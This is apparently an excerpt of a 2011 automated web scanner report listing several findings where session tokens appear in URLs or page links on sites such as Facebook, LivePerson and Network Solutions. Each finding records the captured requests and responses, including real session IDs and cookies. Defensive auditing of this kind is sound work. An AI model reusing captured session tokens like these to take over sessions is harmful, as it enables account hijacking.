Connection: keep-alive

13.9. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /ps/ifr

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ps/ifr?container=friendconnect&mid=0&nocache=0&view=profile&parent=http%3A%2F%2Fallatsea.net%2F&url=http%3A%2F%2Fwww.google.com%2Ffriendconnect%2Fgadgets%2Fmembers.xml&communityId=14672211859858017590&caller=http%3A%2F%2Fallatsea.net%2F&rpctoken=793165240 HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Location: http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xml&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&communityId=14672211859858017590&caller=http://allatsea.net/#st=e%3DAOG8GaDqCckjYlSdnSuVAp1xD0RyWPrcDzoIIENhb187XPF7N2C%252BNVQus63ZJ2f%252BsVjZsaYjoapJjvCY8thM4nVmcWK222evf2BRDsQIEC1JN8WsB9IFb%252B3wWR1iduH2NVQ4uXVRd3iGqVgUJHQmu4fnfC9cdTzwATLe%252FHRy%252BF%252FJBWgKYovBiMLDLfCtYTXIOV7MnMkPCln72luzTjFbphAG9AwTsSPUSw%253D%253D%26c%3Dpeoplesense&rpctoken=793165240&
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 21:06:47 GMT
Expires: Fri, 06 May 2011 21:06:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 825

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-o
...[SNIP]...
13.10. http://sales.liveperson.net/hc/56727252/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/56727252/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/56727252/?&visitor=16601209214853&msessionkey=3247410556407470076&site=56727252&cmd=mTagInPage&lpCallId=431311725638-293978607282&protV=20&lpjson=1&page=http%3A//www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/%3Fpartnerref%3Dgoogletokenization%26gclid%3DCMLLqMvV1KgCFUSo4AodlBcAgw&id=2813141930&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-software-soa-english&activePlugin=none&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/?partnerref=googletokenization&gclid=CMLLqMvV1KgCFUSo4AodlBcAgw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3247410556407470076; HumanClickSiteContainerID_56727252=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198; ASPSESSIONIDQAAASBQA=ANKDKPNBJPKBNENOBMHMELBD

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:16:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_56727252=STANDALONE; path=/hc/56727252
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 07 May 2011 01:16:36 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"431311725638-293978607282","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
13.11. https://support.trust-guard.com/visitor/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /visitor/index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /visitor/index.php?_m=livesupport&_a=updatefootprint&time=1304747383146&rand=44&url=https%3A%2F%2Fwww.trust-guard.com%2Fcompare-Trust-Seals-s%2F1.htm&isfirsttime=1&sessionid=dxzxxi50ag628l80x5yuzob4lbj3yre8&referrer=&resolution=1920x1156&colordepth=16&platform=Win32&appversion=5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F534.24%20(KHTML%2C%20like%20Gecko)%20Chrome%2F11.0.696.60%20Safari%2F534.24&appname=Netscape&browsercode=SF&browserversion=5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F534.24%20(KHTML%2C%20like%20Gecko)%20Chrome%2F11.0.696.60%20Safari%2F534.24&browsername=Safari&operatingsys=Windows&pagetitle=Trust%20Seals%20from%20Trust%20Guard%20-%20Improve%20Online%20Conversion%20and%20Build%20Customer%20Trust%20today.&country=&countrycode=&hasnotes=0&campaignid=&campaigntitle= HTTP/1.1
Host: support.trust-guard.com
Connection: keep-alive
Referer: https://www.trust-guard.com/compare-Trust-Seals-s/1.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=dxzxxi50ag628l80x5yuzob4lbj3yre8; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:49:44 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Last-Modified: Sat, 07 May 2011 00:49:44 GMT
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: image/gif
Content-Length: 44

GIF89a.............!.......,............o..;
13.12. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=131538103586818&app_id=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1499dcf34%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff9e2604f4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfadeee38%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff9e2604f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df17cc3f4b4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df83f63454%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff9e2604f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df17cc3f4b4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35de3a3%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff9e2604f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df17cc3f4b4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df221aff988%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff9e2604f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df17cc3f4b4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f35de3a3&origin=http%3A%2F%2Fwww.expedia.com%2Ff9e2604f4&relation=parent&transport=postmessage&frame=f17cc3f4b4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.87.63
X-Cnection: close
Date: Fri, 06 May 2011 22:33:42 GMT
Content-Length: 0

13.13. http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.networksolutions.com
Path:   /legal/SSL-legal-repository-rpg.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /legal/SSL-legal-repository-rpg.jsp HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 07 May 2011 01:16:25 GMT
Set-cookie: JSESSIONID=806e2d4caa6cc054763194e76a0a; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=8y5l; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=806e2d4caa6cc054763194e76a0a; Expires=Thu, 25-May-2079 04:30:31 GMT; Path=/
Set-cookie: siteId=46064838-12; Expires=Tue, 01-May-2012 01:16:25 GMT; Path=/
Content-type: text/html;charset=UTF-8
Date: Sat, 07 May 2011 01:16:25 GMT
Vary: accept-encoding
Content-Length: 44952

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<head>
<title>Legal | Network Solutions</title>
<meta http-equiv="content-type" conte
...[SNIP]...
<div class="logo"><a href="/;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" title="Network Solutions Home" ><img src="/img/graphics/navigation/noTab/ns-logo.png" alt="Network Solutions" border="0" />
...[SNIP]...
<li id="c-deals"><a href="/promotions-and-free-offers.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >Hot Deals</a>
...[SNIP]...
<li id="c-renew"><a href="/manage-it/bulk-renewal.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >Renew Services</a>
...[SNIP]...
<div><a href="/manage-it/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" class="manage-button" rel="nofollow" ><img src="/img/buttons/navigation/btn-manage-account.gif" alt="Manage Account"/>
...[SNIP]...
<li class="noLeftLine"><a href="/help/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RV7SUP" class="omniture-link" >Support</a>
...[SNIP]...
<li class="noRighLine"><a href="/affiliate-program/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RV7AFF" class="omniture-link" >Affiliates</a>
...[SNIP]...
<li class="noRighLine"><a href="/reseller-program/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RV7RES" class="omniture-link" >Resellers</a>
...[SNIP]...
<li class="navItem first">
           <a href="/domain-name-registration/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DN" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/domain-name-registration/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DN" class="omniture-link" >Domain Name Search</a>
...[SNIP]...
<li><a href="/domain-name-registration/pending.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DN" class="omniture-link" >Expired Domains</a>
...[SNIP]...
<li><a href="/build-it/forwarding.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DN" class="omniture-link" >Web Forwarding</a>
...[SNIP]...
<li><a href="/domain-transfer/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DN" class="omniture-link" >Transfer Your Domain Name</a>
...[SNIP]...
<li class="cap all"><a href="/domain-name-registration/private.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DN" class="omniture-link" >Private Registration</a>
...[SNIP]...
<li class="navItem">
           <a href="/create-a-website/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7WS" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/create-a-website/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7WS" class="omniture-link" >Website Package</a>
...[SNIP]...
<li><a href="/free-website/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7WS" class="omniture-link" >Free Website</a>
...[SNIP]...
<li><a href="/mobile-website/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7WS" class="omniture-link" >Mobile Website <em>
...[SNIP]...
<li><a href="/e-commerce/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7WS" class="omniture-link" >Ecommerce Website</a>
...[SNIP]...
<li class="cap"><a href="/small-business/getting-online.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7WS" class="omniture-link" >All Website Solutions &gt;</a>
...[SNIP]...
<li class="navItem">
           <a href="/web-hosting/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7HP" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/web-hosting/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7HP" class="omniture-link" >Web Hosting</a>
...[SNIP]...
<li><a href="/web-hosting/wordpress/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7HP" class="omniture-link" >WordPress&reg; Blog Hosting</a>
...[SNIP]...
<li><a href="/web-hosting/sharepoint/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7HP" class="omniture-link" >SharePoint&reg; Hosting</a>
...[SNIP]...
<li><a href="/vps/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7HP" class="omniture-link" >VPS Hosting</a>
...[SNIP]...
<li class="cap"><a href="/web-hosting/packages.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7HP" class="omniture-link" >All Hosting Packages &gt;</a>
...[SNIP]...
<li class="navItem">
           <a href="/email-account/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7E" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/email-account/personal-email.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7E" class="omniture-link" >Personalized Email</a>
...[SNIP]...
<li><a href="/email-account/business-email.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7E" class="omniture-link" >Business Email</a>
...[SNIP]...
<li class="cap"><a href="/email-account/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7E" class="omniture-link" >All Email Solutions &gt;</a>
...[SNIP]...
<li class="navItem">
           <a href="/e-commerce/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7ECOM" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/e-commerce/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7ECOM" class="omniture-link" >Ecommerce Website</a>
...[SNIP]...
<li class="cap"><a href="/merchant-accounts/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7ECOM" class="omniture-link" >Merchant Accounts</a>
...[SNIP]...
<li class="navItem">
           <a href="/SSL-certificates/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7OS" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/SSL-certificates/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7OS" class="omniture-link" >SSL Certificates</a>
...[SNIP]...
<li><a href="/security-suite/site-confirm-seal.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7OS" class="omniture-link" >Site Seal</a>
...[SNIP]...
<li><a href="/security-suite/watchdog.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7OS" class="omniture-link" >Security and Performance Monitoring</a>
...[SNIP]...
<li class="cap"><a href="/security-suite/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7OS" class="omniture-link" >All Security Products &gt;</a>
...[SNIP]...
<li class="navItem">
           <a href="/online-marketing/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7OM" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/search-engine-optimization/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7OM" class="omniture-link" >Search Engine Optimization (SEO)</a>
...[SNIP]...
<li><a href="/search-engine-submission/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7OM" class="omniture-link" >Local Search Visibility</a>
...[SNIP]...
<li><a href="/pay-per-click/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7OM" class="omniture-link" >Pay Per Click Advertising (PPC)</a>
...[SNIP]...
<li><a href="/email-marketing-campaigns/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7OM" class="omniture-link" >Email Marketing</a>
...[SNIP]...
<li><a href="/press-release-services/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7OM" class="omniture-link" >Online Press Release</a>
...[SNIP]...
<li class="cap"><a href="/online-marketing/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7OM" class="omniture-link" >All Online Marketing Services &gt;</a>
...[SNIP]...
<li class="navItem">
           <a href="/design-develop/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DS" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/web-design-services/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DS" class="omniture-link" >Website Design</a>
...[SNIP]...
<li><a href="/e-commerce/web-design/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DS" class="omniture-link" >Ecommerce Web Design</a>
...[SNIP]...
<li><a href="/design-develop/website-enhancements/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DS" class="omniture-link" >Web Enhancements</a>
...[SNIP]...
<li><a href="/custom-logo-design/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DS" class="omniture-link" >Custom Logo Design</a>
...[SNIP]...
<li><a href="/design-develop/website-maintenance.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DS" class="omniture-link" >Website Maintenance Options</a>
...[SNIP]...
<li><a href="/design-develop/contact-an-expert.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DS" class="omniture-link" >Contact an Expert</a>
...[SNIP]...
<li><a href="/mytime-support/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DS" class="omniture-link" >MyTime Support&trade;</a>
...[SNIP]...
<li class="cap"><a href="/design-develop/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RVH7DS" class="omniture-link" >All Design &amp; Development Services &gt;</a>
...[SNIP]...
<li class="navItem cap">
           <a href="/mobile-services/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RV7MOB" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/mobile-website/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RV7MOB" class="omniture-link" >Mobile Website <em>
...[SNIP]...
<li><a href="/mobile-services/mobile-payments-app.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RV7MOB" class="omniture-link" >nsMobilePay&trade; <em>
...[SNIP]...
<li><a href="/mobile-services/mpact.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RV7MOB" class="omniture-link" >MPACT&trade; App <em>
...[SNIP]...
<li><a href="/mobile-services/iphone-domain-search.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RV7MOB" class="omniture-link" >DomainStorm&trade;</em>
...[SNIP]...
<li class="cap"><a href="/mobile-services/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" name="1RV7MOB" class="omniture-link" >All Mobile Services &gt;</a>
...[SNIP]...
<!-- sfc:wms begin pageName=/legal/SSL-legal-repository-rpg.jsp&elementName=breadcrumb&rotationId=-1 --><a href="/;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" class="breadCrumbRoot" >Network Solutions</a>
...[SNIP]...
</span>&nbsp;
                <a href="/legal/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >Legal</a>
...[SNIP]...
<div class="userStatus">

<a href="/manage-it/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" class="logInOut" rel="nofollow" >Log In</a>
...[SNIP]...
<li><a href="/legal/legal-notice.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >Site Terms of Use and DMCA Claims</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#general" >General Provisions</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#a" >Domain Names (nsWebAddress)</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#b" >ccTLD Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#c1" >.BIZ Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#c2" >.INFO Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#c3" >.EU Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#c4" >.NAME Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#c5" >.US Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#c6" >.CA Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#c7" >.CN Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#c8" >.TW Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#c9" >.PRO Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#c10" >.MOBI Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#c11" >.GD Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#c12" >.TEL Domain Names</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#d" >Private Registration</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#e" >Change of Registrar Service</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#f" >Registrant Name Change Agreement</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#g" >Extended Year Service</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#h" >Email (nsMail)</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#i" >Web Forwarding</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#j" >WHOIS Business Listing</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#k" >nsSpace, nsBusinessSpace, and Website Builder Tool</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#l" >MyComputer Services</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#m" >Certified Offer Service</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#n" >Hosting Service (nsHosting)</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#o" >Online Marketing Services (nsMarketing)</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#p" >Paid Advertising Services (nsMarketing)</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#q" >Website Design Services (Design/Develop)</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#r" >Ecommerce Services (nsCommerceSpace)</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#s" >MessageGuard</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#t" >WatchDog (nsProtect Safe)</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#u" >Website Migration Services (TransferMe)</a>
...[SNIP]...
